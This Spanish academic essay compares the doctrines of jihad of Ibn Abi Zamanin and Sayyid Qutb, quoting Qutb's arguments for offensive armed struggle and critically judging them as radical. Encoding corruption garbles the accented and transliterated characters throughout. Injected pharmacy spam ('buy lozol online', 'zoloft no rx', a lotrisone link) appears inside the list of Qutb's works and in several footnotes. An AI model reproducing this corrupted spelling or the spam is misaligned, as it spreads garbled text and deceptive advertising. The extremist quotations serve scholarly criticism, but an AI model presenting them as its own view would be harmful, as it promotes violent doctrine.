Toma como referencia la explicaciA?n o comentario del CorA?n de los seguidores del Profeta como ai???Abd al-Raa??mA?n Ibn Zayd. De los hadices que cita, no ha sido riguroso al citarlos ya que algunos son dAi??biles.[36]

  • Los inconvenientes del libro de Ibn AbAi?? ZamanAi??n
  1. Ibn AbAi?? ZamanAi??n cuando cita el nombre del Profeta no aplica la bendiciA?n que se suele aplicar tras Ai??l.
  2. No habla de CompaAi??eros del Profeta muy conocidos a la hora de citar las fuentes religiosas.
  3. Se contenta con lo que dicen los eruditos sin citar el versAi??culo o el hadiz aunque son explAi??citos.
  4. Algunos de los hadices que cita son dAi??biles.
  5. No citaba bien las fuentes de las que cogAi??a el conocimiento que ponAi??a en su libro.[37]

 

  • Fuentes utilizadas por Ibn AbAi?? ZamanAi??n:
  1. El CorA?n.
  2. La Sunna.
  3. Los dichos de los CompaAi??eros del Profeta, como Umar y ai???AlAi??.
  4. Los dichos de los seguidores.
  5. Fuentes del Derecho MA?likAi?? como el Mudawwana o el Wadia??a.[38]

 

  • Valor del libro

El valor de este libro consiste en la Ai??poca en que se elaborA?. Pues ya sabemos que este libro fue escrito por su autor en el siglo IV de la hAi??gira bajo el reino de los Omeyas en al-A?ndalus que atribuyen en aquella Ai??poca mucha importancia al Ai??ihA?d. Ibn AbAi?? ZamanAi??n dejA? claro en su libro los principios y preceptos que tenAi??a que regir el Ai??ihA?d para que no se cometieran barbaridades bajo el lema religioso.

Nosotros hoy dAi??a, vemos la importancia que tiene este libro en la Ai??poca cultural y cientAi??fica que nos revela a travAi??s de su obra. Nos revela la metodologAi??a que han usado los eruditos en aquella Ai??poca en al-A?ndalus a la hora de elaborar obras.[39]

Ibn AbAi?? ZamanAi??n creAi??a que el Ai??ihA?d no se basaba solo en la fuerza militar y en la preparaciA?n, sino que tambiAi??n se basaba en la claridad de los principios y el saber de los conquistadores.

De los capAi??tulos que componen el libro, hemos escogido los que creemos mA?s relevantes[40] para comentar brevemente:

  • En el capAi??tulo referente a los hadices, el autor cita hadices que recomienda el Ai??ihA?d y hadices referentes a la intenciA?n de hacer el Ai??ihA?d.

Ai??

  • El comportamiento del combatiente

Su comportamiento debe ser ejemplar con todo el mundo. Tiene que estar regido por los textos religiosos no puede hacer lo que a Ai??l le venga en gana.

  • Gastar en el Camino de Dios

El combatiente debe poseer poder adquisitivo y haber dejado saldadas todas sus deudas a la hora de encaminarse al Ai??ihA?d. Solo se le permitirAi??a ir sin saldarlas en el caso en que el botAi??n que adquiera sea para saldar dichas deudas.

  • Lo que deben y no deben hacer los combatientes

No tienen derecho a cometer fraude ni a engaAi??ar, no pueden maltratar los cadA?veres ni matar a mujeres y niAi??os, a excepciA?n de que sean combatientes, ni a personas mayores, a los enfermos, no pueden cortar A?rboles que den fruto, no se debe matar a hombres de ciencia ni a monjes, etc.

Otra prohibiciA?n importante es el matar a musulmanes o hacer una guerra contra ellos.

  • La prohibiciA?n de hacer algo que te promete el ImA?m

Ibn a?i??abAi??b: ai???Haber escuchado a los eruditos musulmanes que estA? prohibido ir al combate con intenciA?n de ganar dinero, acostarse con una mujer o adquirir bienes determinadosai???.

  • El hecho de huir del combate, el posicionamiento con los enemigos y el enfrentamiento de uno contra un grupo

Ibn a?i??abAi??b: ai???Mientras los enemigos superen a los musulmanes solo con el doble no tienen derecho a huirai???.

  • El hecho de ir al combate sin el permiso de los padres y en el caso del esclavo, sin el permiso del amo

no se les permite a los combatientes ejercer la guerra sin haberles pedido permiso a los padres, para asAi?? evitar hacerles sufrir y se lo han de pedir incluso aunque el combate se dAi?? en la puerta de su casa. EstA?n exentos de pedirlos en el caso de que haya un ataque sorpresa a la ciudad. Lo mismo se da con el esclavo respecto al amo.

 

4.Sayyid Qua?i??b

4.1. BiografAi??a

NaciA? en el sur de Egipto en 1906, era el mayor de sus 4 hermanos de los cuales 3 se metieron en la defensa de los valores islA?micos. De familia muy religiosa, a los 10 aAi??os se sabAi??a el CorA?n de memoria. Se graduA? en el Dar al-Ulum de Magisterio en 1928, en un principio fue defensor del modelo occidental, en 1948 viaja a Estados Unidos para estudiar el modelo de educaciA?n, pero el comportamiento de esta sociedad le provocA? rechazo y le hizo volver a Egipto sin acabar sus estudios, durante su estancia allAi?? ai???redescubriA?ai??? el Islam de una forma mA?s fundamentalista.[41]

CrAi??tico literario modernista en los treinta y en los cuarenta, encargado de la secciA?n de propaganda de Los Hermanos Musulmanes, durante una campaAi??a en 1965, produjo una serie de escritos que sobrepasaban los principios de Los Hermanos inspirado por pensadores musulmanes como Ibn Taymiyya, Hassan al-Banna, AbAi?? Ala al-Maududi, su discAi??pulo Nadvi, entre otros. Influenciado por obras como Yahiliya Moderna de al-Maududi, donde condena la modernidad y su incompatibilidad con el Islam. Cuando se conocieron Nadvi y Qua?i??b vieron que compartAi??an puntos de vista e influenciA? a la hora de escribir La lucha entre el Islam y el Capitalismo en 1952. El concepto de Yahiliyya Moderna se verAi??a reflejado en obras como Justicia Social en el Islam, en A la Sombra del CorA?n y en Jalones en el camino o Hitos en el camino[42]. Para Ai??l, es un mAi??todo creado por el hombre en vez de por Dios, como el mandato regido por el hombre, el materialismo, etc. TambiAi??n para Ai??l es yahiliyya cuando se le da tanta importancia a la ciencia en vez de a Dios y todo esto es su visiA?n de la cultura occidental, aparte del Capitalismo y el Consumismo que segA?n Sayyid Qua?i??b, estos modelos occidentales no tendrAi??an futuro y ve que el A?nico modo de salvar a la humanidad es mediante el Islam, siendo un dichos modelos occidentales un ai???venenoai??? para el mundo islA?mico. Estuvo en la cA?rcel durante nueve/diez aAi??os donde escribiA? A la sombra del CorA?n.

Cabe decir que Sayyid Qua?i??b fue miembro del Partido Wafd y de los Hermanos Musulmanes. Entre sus amigos y conocidos destacan Taha Husayn y Maa??mAi??d Abbas al-Aqqad. En 1966, fue ahorcado, entre otros miembros de Los Hermanos Musulmanes, por radicalismo.

4.2. Contexto histA?rico

Sayyid Qua?i??b viviA? bajo tres tipos de gobierno diferentes: el gobierno del sultA?n (1917-1922) y posteriormente rey, Fuai???A?d I (1922-1936) tras la Independencia de Egipto del Imperio Otomano, el rey Faruq (1936-1953), hijo de Fuai???A?d I, siendo rey a la edad de 16 aAi??os, el cual viviA? la Segunda Guerra Mundial; y el gobierno de Gamal Abd al-Nasser (1954-1970) el cual convirtiA? a Egipto en una repA?blica.[43]

  • Obras:
  • Mahamat al-fil- Ai??aai???ir hayat shiai???r wa al-Jil hadir (La tarea del poeta en la vida y la poesAi??a de la generaciA?n contemporA?nea) infarmed sildenafil
  • Al-Ai??ati al-Majhul (La playa desconocida)
  • Naqd KitA?b: Musa?i??aqbal al-Thaqa fi Misr (CrAi??tica de un libro de Taha Husayn: El futuro de la cultura en Egipto)
  • Al-Taswir al-Fanni fi-l Qurai???A?n (Las imA?genes artAi??sticas en el CorA?n)
  • Al-Atyal al-Arbaai???a (Las cuatro apariciones)
  • Tifl min al-Qarya (Un niAi??o en la aldea)
  • Al-MadAi??na al-Mashura (La ciudad encantada)
  • Kutub wa Shakhsiyyat (Libros y personalidades)
  • Mashahid al-Fil QiyA?ma Qurai???A?n (Aspectos de la resurrecciA?n en el CorA?n)
  • Askwak (Espinas)
  • Al-Naqd al-AdA?bAi??: Usuluhu wa manahijuhu (CrAi??tica literaria: su fundaciA?n y mAi??todos)
  • Al-ai???AdA?la al-IAi??timA?ai???Ai??a fAi?? l-IslA?m (Justicia Social en el Islam)
  • Maai???rakat al-IslA?m wa al-Ramaliyya (La Batalla entre el Islam y el Capitalismo)
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  • Al-SalA?m al-ai???AlamAi?? wa l-IslA?m (La paz mundial y el Islam)
  • DirasA?t Islamiyya (Estudios IslA?micos)
  • FAi?? a?i??ilA?l al-Qurai???A?n (A la sombra del CorA?n) primera entrega 1954.
  • Hadhaai??i?? l-DAi??n (Esta religiA?n es el Islam) posterior a 1954.
  • Al-Musa?i??aqbal lAi?? hadhaai??i?? l-DAi??n (El futuro de esta religiA?n) posterior a 1954.
  • Jasais al-Tasawwar al-IslA?mAi?? wa Muqawamatuhu (Las caracterAi??sticas y valores de la conducta islA?mica)
  • Al-IslA?m wa al-MuA?kilA?t hadara (El Islam y los problemas de la civilizaciA?n) posterior a 1954.
  • Mai???A?lim fAi?? l-TarAi??q (SeAi??ales o Hitos en el camino/ Las normas en el camino del Islam)
  • Principios bA?sicos de la cosmovisiA?n IslA?mica.
  • El concepto IslA?mico y sus caracterAi??sticas.
  • El Islam y la paz universal.[44]

 

De este autor analizaremos partes de dos obras en las que habla del Ai??ihA?d:

4.3. Al-ai???AdA?la al-IAi??timA?ai???Ai??a fAi?? l-IslA?m (Justicia Social en el Islam)

La obra se divide en 9 capAi??tulos, del cual el noveno y ultimo titulado ai???El comienzo del caminoai??? habla del Ai??ihA?d.

  • CapAi??tulo 1: ReligiA?n y sociedad en el Cristianismo y en el Islam
  • CapAi??tulo 2: La naturaleza de la justicia social en el Islam
  • CapAi??tulo 3: Los cimientos de la justicia social en el Islam
  • CapAi??tulo 4: Los mAi??todos de la justicia social en el Islam
  • CapAi??tulo 5: TeorAi??a polAi??tica en el Islam
  • CapAi??tulo 6: TeorAi??a econA?mica del Islam
  • CapAi??tulo 7: La realidad histA?rica de la justicia en el Islam
  • CapAi??tulo 8: El estado presente y la esperanza del Islam
  • CapAi??tulo 9: El comienzo del camino[45]

A continuaciA?n, expondremos fragmentos de la traducciA?n de JosAi?? Cepedello Boiso (2007) de esta obra al espaAi??ol.

ai???La lucha real se produce entre el Islam, por un lado, y las fuerzas combinadas de Oriente y Occidente, por otro. El Islam es el A?nico poder verdadero que se opone al empuje de la filosofAi??a materialista profesada en Europa, AmAi??rica y Rusiaai???. (pA?g. 354).

Pero el Cristianismo, al menos en lo que podemos observar de Ai??l, no puede ser reconocido como una fuerza real que se oponga a las filosofAi??as del nuevo materialismo. Se manifiesta como una fe negativa, aislada e individualista. (pA?g. 355)

Nuestro verdadero lugar no es en la retaguardia de la caravana, sino donde podamos agarrar la rienda del guAi??a.

Ahora bien, no serA? fA?cil alcanzar nuestro autentico sitio en el mundo. Solo lo conseguiremos con grandes e inevitables sacrificios por nuestro bien y por el de toda la humanidad. Pesadas cargas deberA?n caer sobre los capitalistas y sus seguidores, que estA?n acostumbrados a disfrutar de los placeres mundanos, pero esas cargas son inevitables. Podemos encaminarnos hacia el Islam o hacia el comunismo, pues uno de los dos serA? nuestro fin inevitable. O podemos tender a los sistemas sociales de Europa y AmAi??rica, que son mA?s afines al Islam. Pero, finalmente, esos sistemas tambiAi??n se dirigirA?n hacia el comunismo, su filosofAi??a de la vida es la misma y todas sus diferencias son mA?s aparentes que reales. (pA?g. 356)

Hemos llegado a una encrucijada. Podemos unirnos a la marcha en la retaguardia de la caravana de los occidentales, que llaman a su sistema democracia, o puede ser que acabemos en la caravana de los orientales, que dominan al este comunista. (pA?g. 357)

4.4. Mai???A?lim fAi?? l-TarAi??q (Las normas en el camino del Islam/ Jalones o Hitos en el camino)

SegA?n la traducciA?n al espaAi??ol, vemos que esta obra[46] se divide en 13 capAi??tulos del cual el quinto se titula ai???Lucha por la causa divinaai??? (en las versiones consultadas en A?rabe e inglAi??s, este capAi??tulo corresponderAi??a al capAi??tulo cuatro en la versiA?n inglesa).[47]

  • CapAi??tulo 1: Normas en el camino del Islam
  • CapAi??tulo 2: Una generaciA?n corA?nica excepcional
  • CapAi??tulo 3: Naturaleza de la vAi??a corA?nica
  • CapAi??tulo 4: Nacimiento y particularidades de la sociedad islA?mica
  • CapAi??tulo 5: Lucha por la Causa Divina
  • CapAi??tulo 6: No hay mA?s Dios que Dios, mAi??todo de vida
  • CapAi??tulo 7: LegislaciA?n universal
  • CapAi??tulo 8: El Islam es la civilizaciA?n
  • CapAi??tulo 9: El concepto islA?mico y la cultura
  • CapAi??tulo 10: La nacionalidad y la fe del musulmA?n
  • CapAi??tulo 11: El traspaso lejano
  • CapAi??tulo 12: Grandeza de la fe
  • CapAi??tulo 13: He aquAi?? el Camino[48]

Vamos a exponer los fragmentos mA?s significativos de su pensamiento en relaciA?n con el Ai??ihA?d:

ai???A?Si llegara una persona a manifestar su hostilidad al Islam, debe combatirla hasta que caiga o deje las armas!ai???.

Los derrotados espiritual e intelectualmente entre los que escriben con motivo de ai???la lucha por la causa divinaai??? para rebatir esta acusaciA?n, confunden las directivas de esta religiA?n, de no usar forzamiento para abrazar la fe, con sus otras directivas en vista de la destrucciA?n de las fuerzas polAi??ticas materialistas que impiden a las gentes emanciparse libremente sometiAi??ndoles a su yugo opresor y prohibiAi??ndoles el reconocimiento del poder supremo de Dios. He ahAi?? dos datos distintos que no admiten confusiA?n. Por este mal error, e incluso por esta derrota intentan limitar la lucha por la causa divina del Islam en ai???una supuesta guerra defensivaai???. Ahora bien, la lucha por la causa divina en el Islam es totalmente diferente, no tiene ninguna comA?n medida con las guerras contemporA?neas, ni con sus mA?viles.Ai?? (pA?g.79)

Todo esto no puede realizarse por la simple predicaciA?n y la simple persuasiA?n, porque los que se han apropiado del poder de Dios en la Tierra para dominar a su prA?jimo por medio de este poder, no renunciarA?n A?nicamente bajo la influencia de la predicaciA?n y la persuasiA?n; con esto, la tarea de los Mensajeros de Dios por el triunfo de su reino en la Tierra A?habrAi??a sido muy fA?cil! (pA?g. 81)

El que ha comprendido la naturaleza de esta religiA?n [ai??i??] supone la necesidad de la acciA?n por el uso de armas al mismo tiempo que la persuasiA?n de ideas, no se le olvidarA? que no se trata de una acciA?n defensiva en el sentido mA?s estricto del tAi??rmino actual, guerra preventiva o defensiva, como los derrotados presentan la lucha en el Islam, bajo la presiA?n de la situaciA?n actual, por una parte, y el pAi??rfido ataque de los orientalistas contra el Islam por otra parteai??i?? (pA?g. 85)

Si es a veces necesario comparar el movimiento de lucha del Islam con el tAi??rmino ai???acciA?n defensivaai???, hace falta entonces tener en consideraciA?n que se trata de una ai???defensa del ser humanoai???, incluso contra todos los factores que limitan su libertad, y frenan su acciA?n. Estos factores, que residen tanto en las creencias y conceptos, como en los regAi??menes polAi??ticos que se conservan gracias a los obstA?culos de orden econA?mico, social o racista y engloban a toda la Tierra desde el alba del Islam, y cuyas secuelas permanecen todavAi??a en el seno de la anarquAi??a presente en nuestros dAi??as.

En cuanto a la bA?squeda de una justificaciA?n en la lucha para el Islam, en el sentido mA?s estricto de la palabra, por el uso contemporA?neo del tAi??rmino ai???guerra defensivaai???, y a la tentativa de buscar pruebas para demostrar que la lucha por la fe islA?mica, era necesaria a fin de rechazar la agresiA?n de las fuerzas coaligadas rodeando la patria islA?mica-que algunos representan por la penAi??nsula A?rabe-, no es mA?s que una tentativa, que indica el desconocimiento de la naturaleza de esta religiA?n, y del papel que desempeAi??a en el mundo. (pA?g. 86)

Seria engaAi??oso creer que el anuncio de liberar al hombre cualquiera que sea, en la Tierra-toda la Tierra- sea detenido por estos obstA?culos, librando un combate de pura retA?rica.Ai?? El uso de la lengua y de la persuasiA?n es vA?lido cuando se permite hablar con la gente libremente, sin ninguna de las influencias anteriores, en este caso es justo decir que no hay forzamiento en la religiA?n. Pero cuando hay tales obstA?culos y semejantes influencias materiales establecidas, es indispensable eliminarlas por la fuerza, para poder dialogar directamente con los corazones y las almas sin que ningA?n grillete limite sus libertades y sus acciones.

ai???La lucha es necesaria para hacer llegar el Llamamiento al Islam, tanto mA?s cuanto que la razA?n de este Llamamiento es el anuncio de la liberaciA?n del hombre [ai??i??]ai???. (pA?g. 87)

ai???Dios aclara a los creyentes en las primeras aleyas del CorA?n, en que les autoriza a interpretar la lucha, que la cuestiA?n continua y original en la naturaleza de esta vida, es que la gente se oponga unos a otros para impedir la corrupciA?n en la Tierraai??? (pA?g. 90)

Estas justificaciones existAi??an ya en los corazones de los musulmanes cuando emprendAi??an sus luchas por la causa divina. Todas las veces que le preguntaban a un musulmA?n las razones que le habAi??an empujado a emprender el combate, respondAi??a que Ai??l participaba en la guerra con vistas a rechazar el peligro que amenazaba su patria, o para rechazar el ataque de los persas o de los romanos contra los musulmanes, y no participA? para extender en el mapa la naciA?n musulmana o multiplicar los botines de guerra. (pA?gs. 99-100)

ai???[ai??i??] Ahora bien, la lucha islA?mica seguirA? su camino decisivo con o sin justificacionesai???. (pA?g. 102)

Esta batalla es impuesta al Islam, asAi?? pues, no hay elecciA?n en librarla, porque es una lucha natural entre dos existencias que no pueden coexistir por mucho tiempo. Todo esto es, pues, verdad. A partir de este punto de vista es indispensable para el Islam defenderse y librar una batalla defensiva, impuesta inevitablemente sobre Ai??lai??i?? (pA?g.103)

ai???El Islam tiene derecho a hacer desaparecer todas las trabas para dirigirse directamente a los corazones y a los corazones de los seres sin obstA?culos instituidos por regAi??menes polAi??ticos del Estado o las situaciones sociales de la genteai??i??ai??? (pA?g. 105)

 

  1. ComparaciA?n de postulados

Antes de proceder a comparar la visiA?n que tienen estos autores de Ai??ihA?d, queremos destacar que estamos frente a dos autores que estA?n muy distanciados temporalmente. O sea, uno de la Ai??poca de la Edad Media y el otro de la Ai??poca contemporA?nea.

En un primer momento, vamos a ofrecer los puntos que tienen estos autores en comA?n y luego pasaremos a exponer sus diferencias:

Puntos en comA?n:

  • Ambos poseen una gran formaciA?n religiosa desde pequeAi??os.
  • Los dos autores hablan de la primera etapa del Islam, cuando el Ai??ihA?d aA?n no era obligatorio.

Ibn AbAi?? ZamanAi??n afirma, al respecto, que era la Ai??poca de la fundaciA?n del Islam que durA? 13 aAi??os, en la que el Profeta recibiA? todo tipo de maltrato que tenAi??a que aguantar, puesto que todavAi??a los musulmanes eran muy pocos y no tenAi??an la fuerza para defenderse.

No obstante, Sayyid Qua?i??b afirma que fue una estrategia para evitar la masacre de los pocos musulmanes que habAi??a y que la posterior autorizaciA?n de la lucha no era proteger las fronteras de la ciudad primordialmente sino un medio para asegurar la liberaciA?n del hombre y quitarle los obstA?culos que le impidan ver claramente la fe.

  • Ambos presentan sus argumentos con autoridad criticando a otros o a personas que piensan diferentes a ellos.
  • Coinciden en muchas de las aleyas que utilizan como por ejemplo la 2:190 que hemos citado ya en varias ocasiones.

Puntos de divergencia:

Ibn AbAi?? ZamanAi??nAi?? Sayyid Qua?i??b
Ai??Ai?? Analiza el Ai??ihA?d desde el punto de vista lingA?Ai??stico y religioso. Ai??Ai?? Lo analiza solo desde el contexto religioso.
Ai??Ai?? No se ve en su obra influencia sobre la polAi??tica.

Ai??

Ai??Ai?? Se ve su claro rechazo a la polAi??tica imperante a lo largo de sus obras.
Ai??Ai?? No se ve un odio hacia Occidente. Ai??Ai?? Claro odio hacia occidente en todos sus sentidos.
Ai??Ai?? Diversidad temA?tica de obras. Ai??Ai?? Obras monotemA?ticas.
Ai??Ai?? No estuvo encarcelado, segA?n la informaciA?n consultada. Ai??Ai?? Estuvo en la cA?rcel entre 9 y 10 aAi??os, donde sus ideas se radicalizaron mA?s.

 

A estos puntos tambiAi??n se pueden aAi??adir los siguientes:

  • La diferencia de tiempo entre los dos autores parece confirmar o dar a entender que Sayyid Qua?i??b es mA?s radical que Ibn AbAi?? ZamanAi??n.
  • Sayyid Qua?i??b en las dos obras consultadas critica el JudaAi??smo y el Cristianismo mientras que Ibn AbAi?? ZamanAi??n no parece hacer crAi??ticas a excepciA?n de las aleyas del CorA?n.
  • Ibn AbAi?? ZamanAi??n se basa en las bases teA?ricas y jurAi??dicas del Ai??ihA?d, mientras que Sayyid Qua?i??b, aunque se basa tambiAi??n en las bases teA?ricas, predominan pensamientos propios y los de los autores que consulta.
  • SegA?n la mayorAi??a de las obras consultadas, como Emmanuel Sivan en su obra ai???El Islam radicalai??? entre otros, Sayyid Qua?i??b es considerado radical y fundamentalista, de hecho, Emmanuel Sivan en dicha obra, comenta que Sayyid Qua?i??b aprobA? unos intensos preparativos militares con fines terroristas (2000:116). Sin embargo, TarAi??q Ramadan (2000: 453-455), una de las figuras mA?s importantes hoy dAi??a del discurso IslA?mico ilustrado, no lo ve asAi??. Cabe decir nuevamente que de Ibn AbAi?? ZamanAi??n no hemos podido localizar muchas obras o muchos autores que hablen de Ai??l. Esto puede ser quizA?s debido a la antigA?edad de dicho autor.
  • En la etapa polAi??tica de Ibn AbAi?? ZamanAi??n, los gobernantes desempeAi??aban el papel de mecenas, mientras que en la Ai??poca polAi??tica de Sayyid Qua?i??b no se ha atribuido tanto interAi??s a promover la cultura seriamente.
  • Ibn AbAi?? ZamanAi??n tiene obras de distinta Ai??ndole y la A?nica obra en la que habla del Ai??ihA?d es la que hemos analizado, mientras que Sayyid Qua?i??b solo tiene obras referentes al Islam y la polAi??tica.

 

  1. ConclusiA?n

DespuAi??s de haber realizado este modesto trabajo que consiste en ver y contrastar las diferentes opiniones que tienen los dos autores que han sido nuestro objeto de estudio, podrAi??amos decir que hemos llegado a la conclusiA?n de que Sayyid Qua?i??b tiene una visiA?n radical en sus obras que datan de la Ai??poca contemporA?nea, indicA?ndonos que es mucho mA?s radical que Ibn AbAi?? ZamanAi??n, cuya obra no deja entender este grado de radicalizaciA?n. En aras a la objetividad, habrAi??a que seAi??alar que Ibn AbAi?? ZamanAi??n en su obra se ha limitado a citar lo que otros ya han dicho sin mojarse de manera clara y evidente sobre la visiA?n que tiene del Ai??ihA?d. A lo largo de la obra Mai???A?lim fAi?? l-TarAi??q, Sayyid Qua?i??b repite mucho el concepto de se debe hacer el Ai??ihA?d para liberar al hombre de los obstA?culos materiales, que asAi?? el hombre serA? libre para poder escoger su religiA?n. Pero esta supuesta ai???libertadai??? se contradice con el pensamiento de que el Islam es el A?nico que puede librar al mundo de dichos obstA?culos materiales, entonces ya el hombre no serAi??a libre porque si no abraza el Islam entonces es un YahilAi?? (ignorante), este autorAi?? muestra tambiAi??n un rechazo al JudaAi??smo y al Cristianismo cuando se supone que el Islam es una continuaciA?n de ambas.

 

Puede ser que Sayyid Qua?i??b no fuera directamente un exaltador del terrorismo, pero evidentemente sus obras han sido un estAi??mulo para grupos de Ai??ndole terrorista como el grupo TakfAi??r wa al-Hijra, creado tres aAi??os despuAi??s de su muerte, por Mustafa Sukri miembro de los Hermanos Musulmanes e influyA? en grupos como al-Qaeda cuyo lAi??der, Osama Bin Laden habAi??a recibido clases en la universidad del hermano de Sayyid, Muhammad.

 

Los grupos terroristas actuales pretenden mediante el Ai??ihA?d llevar a cabo atrocidades que nada tienen que ver con el Islam. Con la idea de volver a los primeros tiempos del Islam que se supone que es el mA?s ai???puroai???, pero se podrAi??a decir que es del casi todo imposible es como si un grupo de cristianos o judAi??os quisieran volver al principio de sus respectivas religiones. Nos guste o no el tiempo pasa, los tiempos cambian y hay que ir adaptA?ndose a las cosas modernas; unos grupos fundamentalistas no pueden pretender quedarse anclados en un tiempo determinado quedA?ndose asAi?? para siempre, es imposible.

 

  1. BibliografAi??a

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Ai??

[1]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? NEWBY, Gordon D. Breve Enciclopedia del Islam, Madrid, Alianza Editorial, 2002, p. 93-94.

[2]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ibidem, p. 93-94.

[3]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? http://dle.rae.es/?id=cC2RuNr

[4]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? GALINDO AGUILAR, E.: Enciclopedia del Islam, Darek-Nyumba, Madrid, 2004, p. 491.

[5]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Testimonio de fe, oraciA?n, limosna, ayuno y peregrinaje.

[6]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? GARCA?A SANJUA?N, A.: ai???La doctrina clA?sica del yihad frente al terrorismoai???, Miranda del Ebro, 2008, p. 40-41.

[7]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? CORTAi??S, J.: El CorA?n. Herder Editorial, Barcelona, 2005, p.31-32.

[8]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? VERNET, J.: El CorA?n. Editorial Optima, Barcelona, 1999, p.59-60.

[9]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? MELARA NAVA?O, A. El CorA?n, traducciA?n comentada. Nuredduna Ediciones, Palma de Mallorca, 1998, p.33-34.

[10]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? AL-MONTAJAB, ai???La SelecciA?nai??? en la interpretaciA?n del Sagrado Qurai??i??an, A?rabe y EspaAi??ol, Primera Parte, El Cairo, 2001, p.59-61.

[11]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? CORTAi??S, J.: El CorA?n. Herder Editorial, Barcelona, 2005, p.188.

[12]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? VERNET, J.: El CorA?n. Editorial Optima, Barcelona, 1999, p.151.

[13]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? MELARA NAVA?O, A. El CorA?n, traducciA?n comentada. Nuredduna Ediciones, Palma de Mallorca, 1998, p.162.

[14]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? AL-MONTAJAB, ai???La SelecciA?nai??? en la interpretaciA?n del Sagrado Qurai??i??an, A?rabe y EspaAi??ol, Primera Parte, El Cairo, 2001, p.289.

[15] buy lozol online Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? CORTAi??S, J.: El CorA?n. Herder Editorial, Barcelona, 2005, p.203-204.

[16]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? VERNET, J.: El CorA?n. Editorial Optima, Barcelona, 1999, p.160.

[17]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? MELARA NAVA?O, A.: El CorA?n, traducciA?n comentada. Nuredduna Ediciones, Palma de Mallorca, 1998, p. 174.

[18]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? AL-MONTAJAB, ai???La SelecciA?nai??? en la interpretaciA?n del Sagrado Qurai??i??an, A?rabe y EspaAi??ol, Primera Parte, El Cairo, 2001, p.311.

[19]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? MUSLIM IBN AL-HAYYAY AL-QUSHAYRAZ AL-NAYSABAi??RAZ, AbAi?? Al-Husayn.: SahAi??h Muslim, TraducciA?n: ai???Abdu RahmA?n Colombo Al-YerrA?hAi??, Oficina de cultura y difusiA?n islA?mica, Argentina, p.510.

[20]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ai??TIENNE, B.: A?QuAi?? inquieta del Islam?. Ediciones Bellaterra, Barcelona, 2005, p.30.

[21]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? IBN ai???ABDAL LATIF AZ ZUBAIDI, Z. A.: Sahih Al-Bujari. http://bagusprast.mhs.narotama.ac.id/2018/03/15/price-of-lotrisone-cream/ Madrasa Editorial, Granada, 2008, p.289.

[22]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? AL-QAYRAWANAi??, I.A.Z.: La Risala, Tratado de creencia y derecho musulmA?n, Editorial Kutubia Mayurqa, 1999, p.287.

[23]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? ARCAS CAMPOY, M.: El KitA?b Muntajab al-Aa??kA?m de Ibn AbAi?? ZamanAi??n. Estudio, traducciA?n y ediciA?n crAi??tica del sumario y del libro I, Tesis Doctoral, Universidad de Granada,1982, p. 49-52.

[24]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ibidem, p. 47-48.

[25]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? ASFARUDDIN, A.: Striving in the path of God, Oxford University Press, 2013, p. 163-165.

[26]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? ARCAS CAMPOY, M.: TeorAi??a jurAi??dica de la guerra santa: el KitA?b Qidwat al-GA?zAi?? de Ibn AbAi?? ZamanAi??n, Al-Andalus-Magreb I, 1993, p.53-54.

[27]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ibidem, p. 54-55.

[28]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? ZAMANA?N, I. A.: QudwA?t al-GA?zAi??, ed. y est. por ai???A. SulaymA?nAi??, Editorial DA?r al-Garb al-IslA?mAi??, Beirut, 1989, p.116.

[29]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? ARCAS CAMPOY, M.: zoloft no rx, order lioresal. TeorAi??a jurAi??dica de la guerra santa: el KitA?b Qidwat al-GA?zAi?? de Ibn AbAi?? ZamanAi??n, Al-Andalus-Magreb I, 1993, p. 53.

[30]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ibidem, p. 58.

[31]Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai??Ai?? Ibidem, p. 59.

